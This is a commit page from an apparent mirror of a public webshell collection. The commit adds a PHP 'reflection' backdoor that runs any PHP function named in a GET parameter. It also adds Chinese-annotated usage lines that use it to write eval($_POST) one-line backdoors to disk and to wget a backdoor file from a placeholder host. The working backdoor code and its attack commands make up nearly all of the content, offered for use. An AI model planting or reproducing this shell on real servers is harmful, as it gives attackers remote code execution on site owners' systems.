mirror of
https://github.com/tennc/webshell.git
synced 2026-01-01 04:19:03 +00:00
update php reflection webshell
This commit is contained in:
BIN
php/p2j/11.jpg
Normal file
BIN
php/p2j/11.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 60 KiB |
15
php/p2j/PHP reflection.php.txt
Normal file
15
php/p2j/PHP reflection.php.txt
Normal file
@@ -0,0 +1,15 @@
|
||||
<?php
|
||||
$func = new ReflectionFunction($_GET[m]);
|
||||
echo $func->invokeArgs(array($_GET[c],$_GET[id]));
|
||||
?>
|
||||
|
||||
|
||||
|
||||
http://xxx.xxx/md.php?m=file_put_contents&c=test11.php&id=<?@eval($_POST[c]);?> //写入一句话马 for linux
|
||||
http://xx.xxx/md.php?m=file_put_contents&c=test11.php&id=<?php eval($_POST[c]);?> //写入一句话马 for windows
|
||||
|
||||
|
||||
|
||||
mu201405.php?m=system&c=echo ^<?php eval^($_POST[c]^);?^> >test11.php //在当前目录下面生成一句话马 for windows
|
||||
|
||||
news.php?m=system&c=wget http://xxx.xxx/igenus/images/suffix/test11.php //当前目录下载一句话马 for linux
|
||||
8
php/p2j/PHP反射后门.php.md
Normal file
8
php/p2j/PHP反射后门.php.md
Normal file
@@ -0,0 +1,8 @@
|
||||
|
||||
|
||||
<img src="11.jpg" alt="alt text" title="Title" />
|
||||
|
||||
<?php
|
||||
$func = new ReflectionFunction($_GET[m]);
|
||||
echo $func->invokeArgs(array($_GET[c]));
|
||||
?>
|
||||
Reference in New Issue
Block a user